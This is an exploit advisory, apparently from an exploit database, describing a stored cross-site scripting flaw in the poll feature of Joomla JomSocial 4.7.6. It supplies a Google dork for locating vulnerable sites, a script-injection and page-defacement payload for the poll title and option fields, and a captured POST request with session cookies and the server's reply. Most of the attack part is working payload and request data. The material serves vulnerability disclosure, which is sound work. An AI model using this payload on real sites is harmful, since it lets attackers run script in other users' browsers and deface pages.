# Exploit Title: Joomla JomSocial 4.7.6 Stored XSS # Date: 03.11.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.jomsocial.com/demo # Tested on: Windows 10 # Web Browser: Mozilla Firefox,Google Chrome and Edge #:Google Dorks: inurl:templates/jomsocial/ # Blog : https://pentest.vincent.blogspot.com/ # PoC: https://pentestvincent.blogspot.com/2020/11/joomla-jomsocial-476-stored-xss.html PoC: Stored XSS in the poll. Go to the https://ijoomlademo.com/index.php Create poll: Use for test simple xss code : ""><script>alert(1)</script><script>alert("2")</script><body background="https://i.gifer.com/Nv2.gif"> Field "title and field "add poll option". Update this and we have stored xss and deface background with stored html code injection. https://ijoomlademo.com/index.php Host: ijoomlademo.com .......................................................................................... User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1073 Origin: https://ijoomlademo.com Connection: keep-alive Referer: https://ijoomlademo.com/index.php Cookie: __cfduid=dee102cc0e40cf95be92c643956e474cd1604428425; 4681557252fe8ff3df4a28d60cb41dc7=shg4g73pm6odh4e8hfuc4c2h75; currentURI=https%3A%2F%2Fijoomlademo.com%2Findex.php%3Foption%3Dcom_community%26view%3Dfriends%26task%3DajaxAutocomplete%26allfriends%3D1; joomla_user_state=logged_in option=community&view=frontpage&task=azrul_ajax&func=system,ajaxStreamAdd&no_html=1&008b85046025db389f11292741ac0393=1&arg2=["_d_","&quot;&quot;><script>alert(1)</script>"]&arg3=["_d_","{&quot;element&quot;:&quot;profile&quot;,&quot;target&quot;:&quot;231&quot;,&quot;type&quot;:&quot;poll&quot;,&quot;options&quot;:[&quot;1&quot;,&quot;2&quot;],&quot;settings&quot;:{&quot;allow_multiple&quot;:false},&quot;polltime&quot;:{&quot;enddate&quot;:[&quot;2020-11-03&quot;,&quot;3 November 2020&quot;],&quot;endtime&quot;:[&quot;00:00&quot;,&quot;12:00 AM&quot;]},&quot;privacy&quot;:10,&quot;catid&quot;:1}"]&arg4=["_d_","{&quot;filter&quot;:&quot;&quot;,&quot;value&quot;:&quot;default_value&quot;,&quot;hashtag&quot;:false}"] POST: HTTP/2.0 200 OK date: Tue, 03 Nov 2020 18:53:21 GMT content-type: text/plain;charset=UTF-8 x-powered-by: PHP/7.2.33 cf-cache-status: DYNAMIC cf-request-id: 06310dee9f000033744f1b3000000001 expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=b7CGOI6icRSPny5RypHkJ%2FP%2FfGPQbpAPZalJMzkV6a3yQZwqkqb8tFcZcMnuQNZM45YxUCbr5ZrvHryA0tsZ2qv3NT%2Bh04xxtHJhrpFmcDY%3D"}],"group":"cf-nel","max_age":604800} nel: {"report_to":"cf-nel","max_age":604800} server: cloudflare cf-ray: 5ec84c2a9fd33374-DME content-encoding: br X-Firefox-Spdy: h2 .......................................................................................... Picture: https://imgur.com/a/Cmrcker https://imgur.com/a/82FhgbW https://imgur.com/a/mc7bgkN Video: https://www.youtube.com/watch?v=brmf-Ew4D3k&feature=youtu.be